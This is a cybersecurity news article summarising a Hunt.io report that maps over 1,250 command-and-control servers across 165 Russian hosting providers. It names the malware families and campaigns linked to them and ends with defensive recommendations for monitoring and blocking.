Russian C2 Servers Mapped Across 165 Hosting Providers
Key Takeaways Over 1,250 active command-and-control (C2) servers were identified within Russian hosting environments. These C2 servers are distributed across 165 different Russian hosting providers,...
Key Takeaways
- Over 1,250 active command-and-control (C2) servers were identified within Russian hosting environments.
- These C2 servers are distributed across 165 different Russian hosting providers, including shared hosting, virtual servers, and telecommunication networks.
- The infrastructure supports a wide range of malicious activities, from malware distribution and phishing to information stealing and botnet operations.
- Key malware families leveraging this infrastructure include Keitaro, Hajime, Mozi, and Mirai, alongside offensive security frameworks like Cobalt Strike.
- Multiple active campaigns, such as those distributing Latrodectus v2.3, Lumma Stealer, Remcos RAT, SHADOWSNIFF, SALATSTEALER, and BoryptGrab, are linked to this C2 network.
Cybersecurity experts have uncovered an extensive and organized network of malicious infrastructure operating largely undetected within Russia’s commercial hosting sector. This discovery highlights the deep entrenchment of cybercriminal operations within legitimate internet services.
Table Of Content
During a three-month analysis period, from January 1 to April 1, 2026, researchers documented over 1,250 active command-and-control (C2) servers. These servers were found distributed across 165 distinct Russian infrastructure providers, encompassing shared hosting, virtual private servers, and various telecommunications networks, as detailed in a comprehensive report by Hunt.io analysts.
The Ubiquitous Threat of C2 Servers
C2 servers are critical components in most cyberattacks, serving as the communication hub for threat actors to issue commands to compromised systems and exfiltrate stolen data. The sheer volume of over 1,250 active C2 servers simultaneously residing within Russian hosting providers underscores the scale at which malicious infrastructure has integrated into mainstream commercial networks.
Crucially, these servers are not confined to a few isolated internet corners. Their widespread distribution across 165 different providers complicates detection and blocking efforts, allowing attackers to maintain their operations with greater anonymity and resilience.
Hunt.io analysts and researchers identified these patterns through their Host Radar intelligence module. This tool specializes in correlating C2 servers, phishing infrastructure, open malicious directories, and public indicators of compromise (IoCs) back to their underlying hosting providers. This methodology offers crucial provider-level visibility, transforming ephemeral IP addresses into actionable intelligence by revealing systematic patterns in how malicious infrastructure is deployed and reused across Russian hosting environments.
Across the entire dataset, Host Radar identified approximately 1,290 malicious artifacts during the observation period. C2 infrastructure constituted the vast majority, accounting for roughly 88.6% of all detected activity with 1,252 confirmed servers. Other malicious elements included open directories (5.3%), phishing sites (4.9%), and publicly reported indicators of compromise (1.2%).
Several hosting providers emerged as significant hosts for this illicit activity. TimeWeb led the list with 311 detected C2 servers over the 90-day period. Following closely were WebHost1 with 140, REG.RU with 138, VDSina with 86, and PROSPERO OOO with 80.
Malware Families and Active Campaigns
Utilizing their HuntSQL analytics platform, researchers queried telemetry data across Russian networks to pinpoint the malware families most frequently associated with C2 infrastructure. The findings revealed a diverse ecosystem of threats.
Keitaro, a traffic distribution system often exploited to redirect users to malware, dominated the dataset with 587 unique C2 IP addresses, representing the largest concentration observed. IoT-focused botnets also featured prominently, with Hajime linked to 191 C2 servers, and both Mozi and Mirai demonstrating ongoing abuse of compromised routers and embedded devices.
Offensive security frameworks repurposed for malicious intent were also detected, including Tactical RMM (87 endpoints), various Cobalt Strike variants (a combined 55 instances), Sliver, and Ligolo-ng. Furthermore, scanning and phishing tools such as Acunetix, Interactsh, and Gophish were identified, confirming that this infrastructure supports reconnaissance and credential theft in addition to direct intrusions.

The gravity of these findings is underscored by active campaigns directly linked to this infrastructure. One notable campaign leveraging JSC TIMEWEB infrastructure employed a deceptive CAPTCHA technique called “ClickFix.” This method tricked users into executing a PowerShell command, leading to the download of Latrodectus v2.3 malware, which then communicated with attacker-controlled domains.
Infrastructure hosted by REG.RU was implicated in a Lumma Stealer operation. This campaign exploited Google Groups redirectors to distribute malicious archives targeting both Windows and Linux systems. On Hosting Technology LTD infrastructure, the SmartApeSG campaign deployed the Remcos RAT through fake CAPTCHA prompts on compromised websites, achieving persistence via DLL sideloading.
Beget LLC infrastructure was tied to the UAC-0252 campaign. This operation involved impersonating Ukrainian government institutions and deploying SHADOWSNIFF and SALATSTEALER infostealers by exploiting a WinRAR vulnerability, tracked as CVE-2025-8088.

Separately, Proton66 OOO infrastructure was connected to a BoryptGrab infostealer operation that abused over 100 public GitHub repositories through SEO manipulation tactics.
What You Should Do
- Prioritize Provider-Level Monitoring: Treat monitoring hosting providers, especially those with high C2 activity like TimeWeb, REG.RU, WebHost1, VDSina, and PROSPERO OOO, as a core defensive priority.
- Monitor Outbound Connections: Implement strict monitoring for outbound connections to Russian Autonomous System Numbers (ASNs) known to host C2 activity.
- Enhance Threat Intelligence: Integrate threat intelligence that covers infrastructure-level indicators, beyond just traditional file hashes, to detect emerging threats more effectively.
- Restrict PowerShell Chains: Implement controls to restrict or block ‘curl-to-PowerShell’ chains, which are frequently exploited by ClickFix-style lures and similar attack vectors.
- Maintain IoT/Edge Device Visibility: Ensure comprehensive visibility and security measures for IoT and edge devices, given the persistent activity of botnets like Hajime, Mozi, and and Mirai.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.



No Comment! Be the first one.